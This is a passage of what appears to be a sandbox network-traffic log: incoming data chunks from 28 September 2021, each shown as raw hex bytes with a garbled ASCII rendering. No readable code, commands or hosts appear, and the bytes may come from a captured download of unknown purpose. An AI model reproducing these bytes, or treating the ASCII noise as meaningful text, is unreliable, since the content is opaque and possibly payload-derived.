                                                                        2021-09-28 06:15:57 UTC82INData Raw: 72 a3 c1 da 6e 3b 16 47 1b a9 bf 56 5d d2 3c b0 ec 8c ec de 7a dc bf 9f 2c 9d 72 39 b7 e9 74 bc 62 7d 8d 45 85 eb 17 49 d8 24 44 06 bf e2 4a 9c 1a a1 1e 8d 5f 16 41 38 0f 75 c0 9e 3b c2 ef ad 8a 71 99 a9 02 52 09 0e 20 b0 62 b9 7f d1 64 11 60 fa 3c 79 54 29 13 70 0d 5a 57 71 9c 32 02 11 32 71 e0 fe 12 bc de db 6e 29 b4 d7 92 1c 7d a0 81 16 04 bf 11 52 83 59 2b c8 36 31 e7 f9 9f e6 5c aa a2 84 dc b2 52 e2 e3 c2 2a df da 7a 96 5d c2 31 1f 89 f9 83 10 d6 22 4c 0a ae 50 05 b5 30 5b 35 e8 cf d2 f8 00 43 cd be bb 20 0c 82 45 44 33 5e 82 19 38 70 f5 8a 31 0c 41 80 05 de c8 6c 39 98 4d a8 28 c6 ba 88 56 3f 12 43 55 dc 98 8d 47 d8 0a 4a f7 29 0e 44 83 c3 ef 03 36 1d 6d 53 05 cd 60 bb 2f 6f 76 58 c5 1d 7d 3c 7a 53 2d 65 00 39 51 00 45 52 29 6a 3f 40 9a 5f 20 dd 8b
                                                                        Data Ascii: rn;GV]<z,r9tb}EI$DJ_A8u;qR bd`<yT)pZWq22qn)}RY+61\R*z]1"LP0[5C ED3^8p1Al9M(V?CUGJ)D6mS`/ovX}<zS-e9QER)j?@_
                                                                        2021-09-28 06:15:57 UTC83INData Raw: 5a f7 22 3c ff 9b e5 97 9f 70 93 f3 d6 4e 75 c1 ae 5e 36 a8 f4 45 0d d1 4a d5 2c cd 7e 63 3e 78 8c 4b 56 bf 0d 80 67 32 f0 91 f7 57 64 6f 07 50 1f 0d 37 16 76 ad 52 a3 dc 0f aa 70 88 04 58 a1 37 0f 6a 5f 06 9b 6a b1 c3 65 b3 7d 8c 31 13 92 0f 7c 01 44 31 2e 24 e9 48 a7 0e 08 0c 1d 57 69 75 93 a7 f4 a3 ff f3 47 fb 84 01 ff f2 32 29 40 92 06 63 f5 41 b6 ab 2b a3 8b 9c e4 5f 1a 21 c8 51 74 0f da 99 7e e0 c0 bb 7c 2b 0e b8 2e 49 19 bd 2b d9 19 1b d0 da 6b c8 40 62 d8 1c b6 98 7a 87 4d 75 c2 43 15 41 b6 84 a5 13 ac c0 78 80 8c 74 bc 9c 18 57 bd 9d 8a b0 e9 23 5f 11 12 dd cd ce 87 01 f2 40 22 1d 41 e1 bc 3d 5c 1f c6 29 b5 e2 fe d4 25 03 fa de f0 30 4a 65 5e 3d ca e5 18 c4 b9 5e 2b d5 bf 42 b4 5b 59 eb 3f 23 23 42 70 32 61 49 89 c9 b7 dd b0 54 f1 78 d2 c3 3a 2c
                                                                        Data Ascii: Z"<pNu^6EJ,~c>xKVg2WdoP7vRpX7j_je}1|D1.$HWiuG2)@cA+_!Qt~|+.I+k@bzMuCAxtW#_@"A=\)%0Je^=^+B[Y?##Bp2aITx:,
                                                                        2021-09-28 06:15:57 UTC84INData Raw: 0f b6 27 24 64 de cd d8 e3 2d f5 88 bc bd 3c 0c ee 47 44 33 41 a7 84 42 19 31 8e 3b 22 6c 4e 05 d4 ea 28 2a 94 28 95 3d 50 07 cf 83 3a 12 4f 3e 27 b6 8d 43 cd 29 6a f3 20 37 83 98 cc 17 6d d6 0e 6f 5f a9 6b e5 ba 29 6e eb 6b aa 29 7e 2f 78 23 de 77 0f 33 55 3c 54 13 d0 7a 1f 26 96 e2 27 d7 e4 17 22 1a c5 dc fa 34 75 4e 74 4f 45 7d 15 c2 1c e9 dc a1 d8 50 38 3d a7 43 aa 06 1a 7d ce ae da 62 7b 02 fd fa 9b 5e ae df 8e 85 4c bc f9 7c 5a bf 5e 8f aa 5d d2 e4 b4 37 13 9e ab 2d e7 4c 7b 00 55 c7 4e 67 1e 11 b3 ce 2f 32 d7 54 52 f9 e2 e4 98 81 fa fe d9 8c fb cb cf ce 73 e5 4a b0 a2 a2 5f a9 ac cd d3 b6 46 8a eb ef e4 2e 22 00 2e 80 58 90 13 ab 47 ae a8 2d c9 1a d6 05 97 77 e3 5d cc 0d 02 bd 53 6d 9e d9 92 6c 04 eb bf 68 a7 cf 08 1d 35 4b 99 42 ad 16 e8 cd b4 12
                                                                        Data Ascii: '$d-<GD3AB1;"lN(*(=P:O>'C)j 7mo_k)nk)~/x#w3U<Tz&'"4uNtOE}P8=C}b{^L|Z^]7-L{UNg/2TRsJ_F.".XG-w]Smlh5KB
                                                                        2021-09-28 06:15:57 UTC86INData Raw: 9b f9 72 d6 9b 7c d1 4e 1d 41 bb 49 d4 39 80 c5 6c 88 96 14 8b 9e 09 54 ba 66 f8 dd e8 34 46 30 50 ce c4 db 87 e9 65 1f 61 34 44 d3 88 80 a1 e0 dd 24 bd 7d 01 aa 27 03 f1 e0 9a c3 4b 6f 5d 09 5e 81 53 d1 b5 49 0e 81 ae 44 b8 5f 02 f8 3a 3f 28 20 20 85 0e c9 8c de 6b c9 51 85 e6 a2 28 d7 0e 3f 56 0e a9 75 39 4c fe 11 4c f7 08 df db 76 f9 db 4b 61 13 90 79 0e 5e 68 83 9a 9f 61 a0 ad 19 5e 9a 5c c0 33 e5 eb e7 b9 4d 13 ad f9 a4 0b 35 68 aa 93 35 89 51 9e 8e d6 47 90 59 be ce 86 4c ee 68 11 56 e0 70 70 81 8e 97 0c de f7 10 a0 67 6e 31 61 99 0d ae d4 7e 70 c1 39 a7 27 90 e0 e5 88 e5 7c be 2e e6 bd 28 bb 82 33 80 60 77 af e0 eb 98 50 5d f0 00 6c 46 b7 f4 73 81 53 84 58 76 a0 0f 07 e7 00 75 db 96 33 30 81 b5 be 73 90 f2 83 54 09 02 2f f2 3f f8 7d db 78 0a 29 f1
                                                                        Data Ascii: r|NAI9lTf4F0Pea4D$}'Ko]^SID_:?( kQ(?Vu9LLvKay^ha^\3M5h5QGYLhVppgn1a~p9'|.(3`wP]lFsSXvu30sT/?}x)
                                                                        2021-09-28 06:15:57 UTC87INData Raw: c4 a8 ec 5b ab 92 37 d4 41 65 27 57 ae fe db 47 d8 75 50 99 57 2f 98 85 8d eb c8 8e f9 fb ff bd 32 ed 5d 6c 07 c8 5d a9 a4 a6 58 0b 46 8e fd f8 fd 67 2d 00 35 9c 54 7d 14 bf f9 a9 aa 56 02 19 a5 3f e1 f6 e9 43 a7 7c 38 76 53 67 b2 15 27 6b d8 ed 6f fd 54 bc 4e 1d 1d 08 b3 00 a5 62 c0 e5 f7 0b 32 63 fd bb 8b e3 db 30 03 12 31 0c da c8 c7 d9 45 57 41 9e cd b2 18 37 ea da 04 f9 22 e5 93 81 6c 0f 60 75 6a 30 92 d6 f3 80 98 a8 a2 df a3 34 2f 2b 8b b6 bb c0 a5 dd 58 c2 20 92 66 9e 05 f4 20 99 15 86 50 52 a4 2e d8 bb 78 69 f0 ae 7b e9 b3 df bd 31 7a 82 fd e1 74 f8 fe a4 49 bb 81 dc 79 0e f9 73 fc 11 c5 56 33 16 cc 86 24 dd 92 5e 9b f8 04 f0 80 ff 5e 93 6c 50 96 1b 0e e9 93 58 ab 84 2d e5 0b b1 61 83 03 c5 ee 2f f1 6a 62 00 98 f1 21 3d 6e b0 55 3b 22 1a 98 36 46
                                                                        Data Ascii: [7Ae'WGuPW/2]l]XFg-5T}V?C|8vSg'koTNb2c01EWA7"l`uj04/+X f PR.xi{1ztIysV3$^^lPX-a/jb!=nU;"6F
                                                                        2021-09-28 06:15:57 UTC88INData Raw: cf f0 8e 64 a6 7b 19 2f 89 31 72 8b ac dc 19 48 4a 6e b6 15 28 39 1c 40 25 ec d2 61 55 fa 75 a5 36 95 ee c8 67 e9 df b6 2c 9d 77 53 76 86 40 ba d5 18 b7 f9 81 e1 b3 74 a4 08 3f cd b5 f4 7d 9e 02 8f 76 06 75 10 2e f6 74 a5 ca 99 2e df 8d 9b 8f 02 ad 83 bd 5c 18 00 45 d9 4e b9 75 f3 30 20 6b f9 05 bd 23 6f 17 1f cb 72 15 79 9b 29 26 3d 04 73 ea e5 3f 6c d7 54 41 3f 9c fb e9 d1 77 b6 b6 aa 62 13 d2 56 85 77 08 06 36 3b 4f ef 8a 80 22 9b b1 89 59 b3 91 e6 e1 bf f1 f7 f4 7e 40 e0 c7 06 05 8d c6 91 07 db 35 2e d7 bc 6e 9a 4f de a8 4b da da 04 e1 2e 97 cf af ac 08 42 56 ba bb 01 41 b0 12 31 5a 48 48 31 0a 2a 4f 81 4f d9 2b d2 94 22 9c 28 c5 c3 9e 93 3b 18 5c 29 87 f7 8f 47 d8 34 3b fe 20 2c a4 c4 c1 e9 66 e2 72 e9 58 2d 02 17 85 2b 68 6d 2a 95 2b 7f 36 58 79 cc
                                                                        Data Ascii: d{/1rHJn(9@%aUu6g,wSv@t?}vu.t.\ENu0 k#ory)&=s?lTA?wbVw6;O"Y~@5.nOK.BVA1ZHH1*OO+"(;\)G4; ,frX-+hm*+6Xy
                                                                        2021-09-28 06:15:57 UTC89INData Raw: e3 dc 1c 04 f0 31 e0 c5 86 2c 19 e2 2e dc d4 b1 df 98 a4 3c e9 b5 f4 95 9f 69 b2 f5 c9 6d f9 fe ae 58 37 be cd 6f 04 fa 5b fd 16 d8 80 68 3a ce 94 40 5c 94 48 63 75 17 f2 97 f5 4d 9d 76 d5 5c 37 0c c6 98 62 4e 50 d9 04 0b b1 67 0f b3 63 a8 2f e2 5b 70 0c ea 7d 67 3d 66 b1 7d 84 34 11 b9 45 75 1f ad ce 03 03 f5 dd 87 0e 0f 17 f0 53 5f 7c 9e a5 9e 61 e2 0d 42 d4 0d 3d 95 d8 2e 41 99 92 17 6e 65 08 85 b0 12 98 94 80 68 67 03 df c8 6b 58 ea f1 83 7f cc 82 b2 87 3c 20 ce eb 4b 62 72 28 48 02 ea 38 5c 3e c0 4e 74 f7 31 49 99 5c af 45 77 d1 4d 0e ae be b3 59 39 82 ee cd 88 eb ac b5 9c 0d 5d 24 49 8b 9c e8 4f 9c 18 12 c8 c0 4b a4 ff f3 6c 33 06 47 d9 48 c2 a3 e0 6f 2d aa fa 64 f8 21 3b 29 c8 d8 c1 4b 74 50 0d 36 f3 3e d6 bd 49 3b d0 a8 44 a3 73 59 04 3b 19 24 2c
                                                                        Data Ascii: 1,.<imX7o[h:@\HcuMv\7bNPgc/[p}g=f}4EuS_|aB=.AnehgkX< Kbr(H8\>Nt1I\EwMY9]$IOKl3GHo-d!;)KtP6>I;DsY;$,
                                                                        2021-09-28 06:15:57 UTC91INData Raw: 77 e2 d6 d4 02 15 91 d4 50 ce c1 f2 ae ed ae 50 0e 9a 68 55 5a d6 b9 c0 f2 28 9d da b3 ac 3e 0c eb 44 44 33 59 bc 7d 27 59 33 84 5e 2e 2c 4c 03 c8 d1 6e 3c 87 24 8a 3b c1 3e 17 86 e1 01 53 50 fb 9d a4 56 d5 0d 76 6d 36 08 ab 96 c5 f8 6b eb 12 fc 46 22 65 4c 51 28 68 6d 7c 7e 28 7f 36 58 18 ce 64 0a 20 42 22 44 4c f8 68 3c 3e a1 4c 36 e6 35 19 63 18 cc b3 cd 39 6a 0f 9b 46 41 98 13 c0 0b 8c ec cc 5c 57 3e 2a dc 12 bc 07 10 09 e0 bd cd be 40 56 ee eb 80 4e 5b af b1 27 b6 30 40 a0 55 90 5e ff a8 5d d2 df ec 1d 2b 94 c4 a2 38 4c 7b 35 1d d4 00 7b 0f 1e ac fe d1 33 e3 75 50 82 a7 e5 98 85 2c c1 db 8c fe d3 a5 bd 28 e7 4a bb bc e0 23 db a7 db 99 1c 6e d8 e9 f0 df 17 2d 00 2c bf 47 6e 20 87 68 ac af 56 00 0b c0 0a c8 ed e3 5a da f1 78 58 51 75 91 57 22 7d 2c fd
                                                                        Data Ascii: wPPhUZ(>DD3Y}'Y3^.,Ln<$;>SPVvm6kF"eLQ(hm|~(6Xd B"DLh<>L65c9jFA\W>*@VN['0@U^]+8L{5{3uP,(J#n-,Gn hVZxXQuW"},
                                                                        2021-09-28 06:15:57 UTC92INData Raw: ee 5f 0a bf 33 5b 0c 64 9e 64 ea 27 44 58 fa 36 b3 a2 ab ad 52 7c cf 59 1f 50 ae 95 44 1e 7e c4 42 85 97 70 6f 8b df d3 80 63 8b 9d e7 2b 41 0b 18 cc d5 db 91 f0 0d 6d 0c 31 52 ca a8 dd b3 f3 dd 2d bb e1 6c 15 24 2f f2 f0 48 c1 4b 65 4b 18 db f8 12 c2 bf 5b d8 c2 80 41 a4 7c 58 e9 30 35 30 33 a9 25 9f 4c a1 d1 7c 44 3d 59 68 15 13 02 38 2c 59 11 a0 69 2c 62 11 1a 7f b5 f4 a5 3e 7e e8 da 6e 7d 08 55 e5 2f 5e 79 8b ad cc 9e a1 8b 09 34 59 4a c9 3f f2 9d 57 0c 65 2c bd fc dd 55 22 7b aa bb 66 81 4e 81 79 c1 fd e8 10 ad cb 02 d3 7a 66 0e 4a db 39 72 90 8e 81 16 b6 41 53 b4 70 62 24 12 59 07 ae c1 6b 40 c2 c8 a6 1a 99 d4 5a 69 f5 43 95 2c 8c 7f 37 b1 78 41 92 68 66 a3 ef 57 f8 17 40 fb 19 4e 06 a4 fe 66 9e ed 88 8c 82 58 01 2a 7a b8 a3 c1 86 20 dd 8a 99 99 7b
                                                                        Data Ascii: _3[dd'DX6R|YPD~Bpoc+Am1R-l$/HKeK[A|X0503%L|D=Yh8,Yi,b>~n}U/^y4YJ?We,U"{fNyzfJ9rASpb$Yk@ZiC,7xAhfW@NfX*z {
                                                                        2021-09-28 06:15:57 UTC93INData Raw: 43 f7 70 7e 5a b5 74 b3 74 5d d8 c8 ed 3e 89 87 c9 aa 9d 90 7d 1f 19 c5 4a 70 d9 84 bf f2 d3 48 26 75 50 86 06 aa 89 83 98 cc cf a4 27 d7 a5 bb 24 6a 4d ba 8a e3 49 bd b2 f3 30 0b 46 80 c3 6c d5 3d 27 11 33 9b 6d d0 10 87 6e ba 27 51 00 1a d7 15 f7 e2 cb fe cd 0f 73 5c 09 6d 9a 5d 34 66 a6 ce 69 e5 8e cd 73 c6 1d 02 9f 6a d2 62 ca cb a7 03 19 2e f4 d2 1e ee cf 1e de 15 42 34 ce 45 ca c6 21 3c 26 cb db 9a b1 1f aa d2 2c 6f 34 cb 9d 97 63 cc 43 c9 6f b4 fb 41 7f 87 9e 24 9c cb b7 21 14 84 89 b1 35 f9 f3 f5 02 c8 31 95 7d 2e 04 f4 24 9e 37 f1 57 de e4 3d d2 ab 63 73 d9 2d 3e f8 b9 d6 bd 30 7b 82 f1 ef 51 ea f9 85 51 26 b5 cb af 1c da 51 f6 00 c0 40 41 e9 33 73 5a 5b aa d2 9d 74 3b f2 fb 22 4d 9a 6a 29 26 c7 0e ed 9e c7 1a 45 78 55 18 bf 61 fa d9 49 a8 2b dd
                                                                        Data Ascii: Cp~Ztt]>}JpH&uP'$jMI0Fl='3mn'Qs\m]4fisjb.B4E!<&,o4cCoA$!51}.$7W=cs->0{QQ&Q@A3sZ[t;"Mj)&ExUaI+
                                                                        2021-09-28 06:15:57 UTC95INData Raw: 03 28 42 1a 58 b1 b0 5f 50 55 94 81 af bd e1 18 b6 e8 9d 6f bd 60 05 74 74 31 72 87 92 13 1c 48 40 7e a6 72 7a 13 bf 4a 0d a4 f8 70 5f d2 3c c8 5b 9d ff c7 50 f5 5b b7 08 9e 75 2e d4 ea 42 be 68 51 ab fd 90 e0 7e 8d f0 0a 4e 57 bb f0 3f bb 1a 8d 80 32 5e 10 2e a0 24 71 ce 86 7a 9a 88 b1 07 70 93 8b 91 04 18 0c 21 02 5f a9 7c ca 62 73 7a e3 0b 83 3f 47 17 1f cb 49 58 6a 94 36 35 cd 06 73 e0 e5 2a 6c d5 cc be 50 94 f8 92 16 73 9e dd 1f 0d 9d ff 58 80 4e 54 12 27 3e 82 11 8e ea 39 cf 8b 96 d8 9e d7 ca ea c0 1c 4c f5 7a 96 03 ff 06 10 9f 81 13 3f a8 2c 3c fc c1 3e 0d b2 2b 44 4b cd dc c7 c1 68 85 c1 ef ac 32 33 36 56 56 28 5a ae 28 5e 36 31 8e 3b 19 3f 5d 14 cb ec 3d 39 86 33 8d 3d 10 df a8 90 3b 18 41 6b 9b b4 8d 4d ff 0e 77 f8 66 0a 85 83 e3 52 6d fa 1d 39
                                                                        Data Ascii: (BX_PUo`tt1rH@~rzJp_<[P[u.BhQ~NW?2^.$qzp!_|bsz?GIXj65s*lPsXNT'>9Lz?,<>+DKh236VV(Z(^61;?]=93=;AkMwfRm9
                                                                        2021-09-28 06:15:57 UTC96INData Raw: 24 57 df a3 35 3c 27 89 b1 3d f9 be f5 02 c8 22 8e 74 f0 04 f4 22 88 09 f9 ba de e2 2a da b9 14 80 f7 22 39 eb b7 a3 73 9f 7a 86 f5 e9 47 b9 ff ae d3 1c be dc 78 72 36 40 fd 15 cd 0d 1a 14 cc 86 36 bf 93 5e 99 76 40 13 80 fe 49 98 01 64 5c 1b 04 ef e9 3a af 52 a8 b2 ef b1 63 85 06 32 4c 2f f1 6f 71 63 d0 7c 67 37 6c ca 9e 95 22 1e 90 65 92 18 ba 34 14 2d 8c 22 8c 0e 0c 83 b9 3d 07 64 9a ad e7 d1 06 0d 46 d3 80 6c 72 d8 2c 3e 5f 90 6c 8d eb bf b3 09 b1 dd fb 89 68 6a 18 5a 2a 47 5c fa cf 67 72 7b 84 aa 7f 4e 79 c1 e8 43 76 cf 2a 48 0c 66 f4 8a f7 d9 41 60 0e 21 00 99 70 ab 21 09 d3 4a 1f 3f c9 9d 5b 18 82 d2 13 62 90 67 b1 b6 09 5e b8 53 88 9c 37 35 4c 18 d8 cc c4 c0 98 ec f5 54 ef 37 44 d9 a0 d3 a5 ff c3 d3 ab c7 63 e9 34 07 8f 51 d8 c1 4a 18 b0 11 c8 f6
                                                                        Data Ascii: $W5<'="t"*"9szGxr6@6^v@Id\:Rc2L/oqc|g7l"e4-"=dFlr,>_lhjZ*G\gr{NyCv*HfA`!p!J?[bg^S75LT7Dc4QJ
                                                                        2021-09-28 06:15:57 UTC97INData Raw: fe 43 ea 33 8f b4 8f c2 90 92 e0 97 53 3c f7 f5 69 92 45 d0 2a 5a 81 d1 4d 05 d2 2e 0f c1 a8 24 98 b2 21 56 70 df e5 ac f0 28 8c df 24 b6 e8 2a 89 6d 73 39 48 bb 1f 19 60 33 8e 3b d4 2e 4b 2f de c3 7b 28 94 22 9c 0a c6 bb 8b 91 35 87 45 43 f5 5c 8f 6f c5 1c 79 f6 22 30 f1 8d c2 e9 68 f8 0b 10 52 2c 04 60 b9 5a 17 65 54 a0 54 73 3d 70 38 cc 1a 93 33 44 39 36 54 2f 7b 37 2d ba 20 30 d6 e4 0c 69 1f a0 a1 fa 3a 6a 0d a0 74 6b 5d 78 7d 0c e3 c0 cc 74 d1 3a 3b de 57 82 05 3c 05 f3 c3 12 69 53 41 d5 fa 91 5c c6 28 8d 85 2e cf bf 7e 94 b5 76 d9 bc dd cc cd fc 31 33 21 c5 a8 e6 64 fc 1d 1d de c1 72 0e 1e a8 de d1 32 fb 75 dd f9 2a e4 99 05 9d c1 db 88 e7 ad b1 bc 32 e3 c4 0d 9d 38 50 a2 8d f4 94 b3 4c 9c e7 f6 c2 62 3b 36 33 af 65 ed aa 6a 6e bb ce 37 0a 31 d2 07
                                                                        Data Ascii: C3S<iE*ZM.$!Vp($*ms9H`3;.K/{("5EC\oy"0hR,`ZeTTs=p83D96T/{7- 0i:jtk]x}t:;W<iSA\(.~v13!dr2u*28PLb;63ejn71
                                                                        2021-09-28 06:15:57 UTC98INData Raw: a4 e2 6a 93 2b 1b a0 89 5f 10 3f f0 13 8b cb b5 26 cc 99 9f fb 28 93 81 b7 5a 14 1b 32 98 5d bd 68 25 73 0e 68 eb 07 bd 50 38 11 04 3f 5b 7b 7e 82 29 12 6d 02 73 f1 f0 20 83 db f7 6d 14 4e e2 81 18 77 a7 b6 03 f3 96 ff 5d 8a 5d 39 09 37 31 e9 e1 87 f9 37 9e b1 80 cb 64 90 ca ef cc 3f e1 dc b9 97 57 d2 0f 0a 93 d5 47 05 d2 3d dd c7 82 55 18 b8 3b 44 5e dc dc d6 ea d6 87 e5 b9 be 21 17 02 5c 57 3d 48 a0 16 27 a6 32 a2 32 1d 3d 48 05 cf c6 74 21 6a 23 b0 28 ed b5 98 f8 c4 ed ba 4a de b6 8d 47 c1 2c 7b fc 6b 26 8c 87 11 e9 6c eb 1f 02 db 2f 04 6e 96 26 6b 70 7a a1 01 51 3e 70 3a bd e7 02 33 4e 49 38 e0 2f 7b 35 24 a9 5f 5d d9 e5 08 6f 0e c9 a1 f9 3a 6a 0d 8d 4a 14 59 16 c0 09 e4 a9 15 5d 51 3e 17 d6 7a 82 02 3d 05 f6 c3 12 69 53 41 8c 7e 93 5c df 62 8e 96 78
                                                                        Data Ascii: j+_?&(Z2]h%shP8?[{~)ms mNw]]9717d?WG=U;D^!\W=H'22=Ht!j#(JG,{k&l/n&kpzQ>p:3NI8/{5$_]o:jJY]Q>z=iSA~\bx
                                                                        2021-09-28 06:15:57 UTC99INData Raw: 9b 42 24 5f 60 00 ec 9a 4d c2 a5 a2 cf 01 ae 76 92 01 49 b9 2a ee 61 8d 0d b3 6b 65 3f 15 bd 7c 95 26 12 fd 94 77 18 b0 5f d3 2e f7 c3 93 05 1b 08 0e 43 76 70 64 a6 c9 a9 f5 1e 43 d7 93 12 8a cf d2 3b 65 90 3c 6f d3 56 4a 78 f9 98 9c bb 6d 60 1f 23 c9 47 84 fe db 88 76 b7 95 ab 79 39 21 c8 c0 88 1d b9 2e 3b 85 66 8f 64 8d aa 3a 76 f0 2d bb 8e 7a 95 87 7d d1 4a 17 2b af 9e 5b 16 86 ed 7d 8b 90 6d a6 8c 18 4e c5 43 db d7 eb 36 26 58 d5 cd c4 d1 8c 84 e3 6d 20 32 42 c7 76 ea 28 e2 d7 27 8a eb 7a eb 25 5c ed 36 d9 d7 b5 64 47 16 ca 89 02 d2 b5 47 20 dc a6 92 9a fc 43 fa 30 26 2c 3b cd 22 60 4d 89 d8 72 40 fa 78 f5 a3 2c c2 2b 22 5b 75 a8 7b 26 66 06 0f 70 71 22 b7 13 76 f3 cc 46 72 6c 56 f7 25 5a 6e 9e a6 0e 48 b3 a6 1b 2f 32 4f c4 35 98 88 d8 bb 49 1f a3 e4
                                                                        Data Ascii: B$_`MvI*ake?|&w_.CvpdC;e<oVJxm`#Gvy9!.;fd:v-z}J+[}mNC6&Xm 2Bv('z%\6dGG C0&,;"`Mr@x,+"[u{&fpq"vFrlV%ZnH/2O5I
                                                                        2021-09-28 06:15:57 UTC100INData Raw: ae 10 45 49 e7 b3 8e 56 d7 73 ef fe 20 2c a1 ad c1 b9 7d ff 15 02 93 2c 04 62 97 37 79 63 45 af 52 66 3d 70 38 c6 75 05 48 5e 32 4b 5f 3f 7e 48 0b af 5d 24 b8 20 09 6b 0f ec ce ed 13 fd 0b 8a 44 44 f0 c9 ce 1f e5 38 d8 7b 51 38 20 bb 2a a8 06 1a df f3 fc b5 a0 52 47 f9 eb 95 33 1d 19 8e 83 4a 9f c4 73 5b b5 72 e0 91 5d d8 c6 f5 37 43 ef c9 a9 e6 48 55 87 1f d4 4b 65 0d 4e d7 f3 d0 33 ff 77 00 f9 38 e5 98 81 a1 02 da 8c f7 82 7b 96 1a d0 4a ba 80 f4 56 81 9e db 93 01 98 95 e2 d8 e4 3d 2d 0a 13 89 4c 46 2b 87 68 a6 a2 7e 31 1a d6 0b cf f0 eb 75 f4 0f 79 7e 8f 7a b0 50 0f 6b d3 d4 69 e5 8e cf 32 1f 4f 8e 9b 4c a7 62 ca cd b4 09 1f 69 4e 0c 0f ec c1 36 08 10 40 32 f5 c8 74 20 21 20 32 df cf b2 01 2f ae d8 c2 f3 34 cb 4a 86 6f c9 7d 64 69 8c 57 57 f2 80 9e 35
                                                                        Data Ascii: EIVs ,},b7ycERf=p8uH^2K_?~H]$ kDD8{Q8 *RG3Js[r]7CHUKeN3w8{JV=-LF+h~1uy~zPki2OLbiN6@2t ! 2/4Jo}diWW5
                                                                        2021-09-28 06:15:57 UTC102INData Raw: 72 c3 a3 e6 ff b7 a8 eb 78 fd 3f 6c 52 c8 d8 cb 54 76 47 17 c8 e3 14 ce 4b 42 0a d3 a4 47 c9 53 40 fa 3e 5a b9 39 b6 38 6b 53 9e d8 6d 5d 2a 48 18 a3 00 c6 3b 57 7c 0f b8 7e 1f e2 01 10 60 be 19 a2 12 67 ff c3 bd 71 3b 56 fe 26 25 72 80 b2 dc 0f 38 a7 1b 2f 57 41 d3 31 e3 89 df ac b3 18 90 ff cf 59 31 68 b1 bd 68 82 af 95 ab 88 d3 98 16 bd ce 88 7a 21 41 11 5c c9 20 77 90 81 88 04 18 dc 6e b7 71 71 70 80 5b 08 b6 c7 fd 4e d7 2f bf aa 8e fa d7 69 f3 cc 8e 29 86 6a 23 27 97 45 a2 7d 63 39 e9 84 f6 07 c3 e1 0f 52 18 da 5d 79 97 19 96 aa 9a 59 10 3f f2 10 69 34 98 06 da 82 e2 86 70 93 85 ba 40 0e 86 81 f7 e5 b9 7f d1 6d 3f 78 f5 14 a8 56 36 1a e1 c0 76 4b 79 e0 2d 0f 7e 02 70 9b ed 3b 7d de f3 f1 3d 9c f3 84 04 18 1f b2 1d 07 88 c3 45 85 5f 55 02 2c cf ec d2
                                                                        Data Ascii: rx?lRTvGKBGS@>Z98kSm]*H;W|~`gq;V&%r8/WA1Y1hhz!A\ wnqqp[N/i)j#'E}c9R]yY?i4p@m?xV6vKy-~p;}=E_U,
                                                                        2021-09-28 06:15:57 UTC103INData Raw: da 83 f6 d0 2a 3d 2d 00 a3 86 5b 4e ed 87 68 ac 36 5f 1f 13 f6 fe e3 f6 e3 c1 c4 10 73 54 ac 6d 9a 57 b9 62 cd f7 49 1a 8c cf 08 83 14 14 84 4e c8 cb ca cd be 16 2b 7a e1 d4 1e e6 c4 3d f6 10 6e 1b da b3 c3 c7 21 39 30 a4 c3 b3 12 1b c5 51 06 f3 3e a1 95 fd 7e d9 6b 73 bb 9c 66 55 f2 8a 88 3a f2 76 a3 35 36 38 85 a2 3b d1 b8 f1 1a 3c 21 b4 06 1e 7f fa 27 8a 1b eb ca dc e2 24 d2 a3 7a 61 f7 33 39 f6 a3 20 94 b3 6d 80 8c c7 46 f9 fa a8 76 ac bc dc 73 19 cf 2f 54 11 cf 74 76 07 df 88 4b 4d 97 41 84 8a 3a dc 9a fc 36 94 6f 2b 59 1c 80 5a 2c 61 34 50 a2 c5 1d a9 0c 28 04 49 a2 30 eb 78 77 0c 8e 79 79 c3 6f 9d 6a 97 59 14 93 1e 71 0e 92 aa 00 2f fd d3 96 61 a1 0d 0e 58 6c 6f 89 a3 e5 bb e6 12 4a 29 83 3b 82 da 57 34 48 92 13 69 c3 24 b5 87 0c a4 91 e4 c1 60 1a
                                                                        Data Ascii: *=-[Nh6_sTmWbIN+z=n!90Q>~ksfU:v568;<!'$za39 mFvs/TtvKMA:6o+YZ,a4P(I0xwyyojYq/aXloJ);W4Hi$`
                                                                        2021-09-28 06:15:57 UTC104INData Raw: ba aa 54 bd 32 0c b9 f9 81 ef 12 0f 8b 11 45 06 b1 c5 4c 88 0c 9a a8 89 4e 18 36 0a 0e 59 c4 b9 2a 8e 80 99 05 5a 93 81 bc 5c 10 1b 3e 98 5d b1 69 25 73 0e 68 e4 07 b1 50 38 1d 00 e5 a4 56 57 99 08 0b 46 bb 8f 1f 0b 10 6e ea d8 68 43 9c f9 92 fc 77 b6 a3 0b 06 bc c8 56 84 48 ba 05 1a 33 f5 f5 8e ed 25 60 a1 a8 d4 8d 9a e6 e4 dc c2 f6 d8 78 bd 55 ff e1 1b 81 f9 d8 16 d6 2e 4f e5 ae 50 0f b2 21 57 5a 9c 96 fa 63 28 86 c3 07 b2 37 0c 0c 47 44 33 53 d3 78 51 57 32 a6 90 08 2e 46 1a d5 a0 01 48 9b 23 b4 88 c4 b0 aa 8e 2b 70 2f 23 fb b7 a5 e4 d0 1c 73 e3 35 44 e6 e7 cc e8 44 5e 1f 6d 53 0d b8 63 bb 29 b2 78 4d c8 43 1f 84 5a 2f fe 63 00 1b 45 33 4b b8 2e 7b 22 39 bd 55 18 cf e5 08 6b 09 db d4 f2 c5 6b 25 87 4d 76 5f 73 df 02 bc 42 dd 58 4b 2b 33 d4 6c a0 19 19
                                                                        Data Ascii: T2ELN6Y*Z\>]i%shP8VWFnhCwVH3%`xU.OP!WZc(7GD3SxQW2.FH#+p/#s5DD^mSc)xMCZ/cE3K.{"9Ukk%Mv_sBXK+3l
                                                                        2021-09-28 06:15:57 UTC105INData Raw: 76 76 03 32 8d 67 55 82 58 8a 47 84 ef 96 ed 45 9a 7f 23 42 15 f0 ec b6 47 a8 29 be ce 0b b5 76 ef 37 06 b7 20 e2 63 73 1d 97 62 6c c3 6f 9d 71 9c 3d 02 d6 de 8b e7 45 2f 0e 3c ff c5 9d 06 17 01 f0 53 5f 68 9f dc fe ab e2 09 53 b9 b1 dd 8a d5 3f 32 49 83 1f 73 15 be 9b 89 02 b1 01 3c 72 ba 0d fb da 40 50 e4 c8 91 74 dd 8d b5 69 c3 0d ef f9 4c 62 a4 29 48 02 71 e1 2e 8e 27 ba 8b ef 36 a4 90 70 bc 5a 63 dc b4 14 7c ab 9a 58 1a 9f c9 b8 a2 ab 66 b5 96 74 45 aa 63 8f 83 e4 27 44 18 03 c4 db c8 70 fe df 75 25 35 4c c6 bc 14 8b db d6 2d a0 c3 da e9 25 09 86 ea d9 c1 4f 7a 4e 02 c0 f2 03 db ab bd 27 ef a3 47 ba 69 97 d2 b1 37 21 33 a5 36 